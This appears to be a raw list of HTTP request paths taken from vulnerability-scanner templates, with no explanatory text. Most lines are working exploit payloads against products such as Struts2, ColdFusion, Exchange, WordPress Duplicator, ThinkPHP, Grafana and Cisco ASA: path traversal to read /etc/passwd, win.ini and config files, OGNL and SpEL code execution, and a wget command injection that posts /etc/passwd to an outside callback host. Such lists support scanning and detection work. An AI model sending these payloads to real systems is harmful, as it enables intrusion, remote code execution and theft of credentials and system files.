/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
/login/../../../etc/passwd
/cgi-bin/;cat$IFS/etc/passwd
/poc.jsp/
/poc.jsp?cmd=cat+%2Fetc%2Fpasswd
/passwordrecovered.cgi?id={{rand_base(5)}}
/struts2-rest-showcase/orders/3
/orders/3
/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action
/cgi-bin/config.exp
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/node/1?_format=hal_json
/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php
/analytics/saw.dll?bieehome&startPage=1
/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development
/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20{{interactsh-url}})
/api/snapshots/:key
/module/api.php?mobile/webNasIPS
/doAs?=`{{url_encode(
/autodiscover/autodiscover.json/v1.0/aa@{{Host}}?Protocol=Autodiscoverv1
/autodiscover/autodiscover.json/v1.0/aa..{{Host}}/owa/?&Email=autodiscover/autodiscover.json?a..{{Host}}&Protocol=Autodiscoverv1&Protocol=Powershell
/autodiscover/autodiscover.json/v1.0/aa@{{Host}}/owa/?&Email=autodiscover/autodiscover.json?a@{{Host}}&Protocol=Autodiscoverv1&Protocol=Powershell
/autodiscover/autodiscover.json?aa..{{Host}}/owa/?&Email=autodiscover/autodiscover.json?a..{{Host}}&Protocol=Autodiscoverv1&{{Host}}Protocol=Powershell
/autodiscover/autodiscover.json?aa@{{Host}}/owa/?&Email=autodiscover/autodiscover.json?a@{{Host}}&Protocol=Autodiscoverv1&{{Host}}Protocol=Powershell
/autodiscover/autodiscover.json?aa..{{Host}}/owa/?&Email=aa@autodiscover/autodiscover.json?a..{{Host}}&Protocol=Autodiscoverv1&{{Host}}Protocol=Powershell
/autodiscover/autodiscover.json?aa@{{Host}}/owa/?&Email=aa@autodiscover/autodiscover.json?a@{{Host}}&Protocol=Autodiscoverv1&{{Host}}Protocol=Powershell
/autodiscover/autodiscover.json/v1.0/aa@autodiscover/autodiscover.json?a..@{{Host}}&Protocol=Autodiscoverv1&Protocol=Powershell
/autodiscover/autodiscover.json?@{{Host}}/&Email=autodiscover/autodiscover.json%3f@{{Host}}
/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName(
//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx
/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx
/example-vulnerable-path
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/some-endpoint-that-triggers-auth-bypass
/auth/login
/ecp/PersonalSettings/HomePage.aspx
/?doAs=`{{url_encode(
/test
/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/{{rand_base(4)}}.css
/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/{{rand_base(4)}}.css
/public//?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
/ReportServer/Pages/ReportViewer.aspx
/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything
/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything
/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd
/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini
/api/geojson?url=file:///etc/passwd
/api/geojson?url=file:///c://windows/win.ini
/js/log.js
/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/..
/passwordrecovered.cgi?id=nuclei
/config/getuser?index=0
/pentaho/Login
/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js
/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini
/public/plugins/alertlist/../../../../../conf/defaults.ini
